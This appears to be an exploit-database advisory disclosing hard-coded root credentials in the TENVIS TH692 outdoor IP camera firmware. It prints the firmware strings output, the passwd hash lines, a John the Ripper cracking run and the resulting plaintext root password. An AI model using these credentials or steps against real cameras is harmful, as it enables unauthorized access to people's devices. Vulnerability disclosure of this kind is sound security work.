
5 new exploits Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64) WordPress leenk.me Plugin 2.5.0 - CSRF/XSS WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials Novell ServiceDesk Authenticated File Upload pfSense Community Edition 2.2.6 - Multiple Vulnerabilities
Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials
Date: 4/16/2016
Exploit Author: DLY
Vendor: TENVIS Technology Co., Ltd
Product: TH692- Outdoor P2P HD Waterproof IP Camera
Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html
Affected version: TH692C-V. 16.1.16.1.1.4
firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov
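Hard-coded accounts recovered from the firmware image (both are UID 0 with /bin/sh, per the passwd entries in the strings output below):
user: Mroot
pass: cat1029
user: Wproot
pass: cat1029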
root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root
rootpath
rootfs crc %lx
------------------start upgrade rootfs------------------
------------------end upgrade rootfs------------------
bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext)
nfsroot
7root
Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot
k01000100 rootbox nohelp info
root::0:
Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh
Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh
nfsroot
pivot_root
xswitch_root
chroot
nfsroot
root@kali:~# john --show ipcamhashes
Mroot:cat1029:0:0::/root:/bin/sh
Wproot:cat1029:0:0::/root:/bin/sh
2 password hashes cracked, 0 left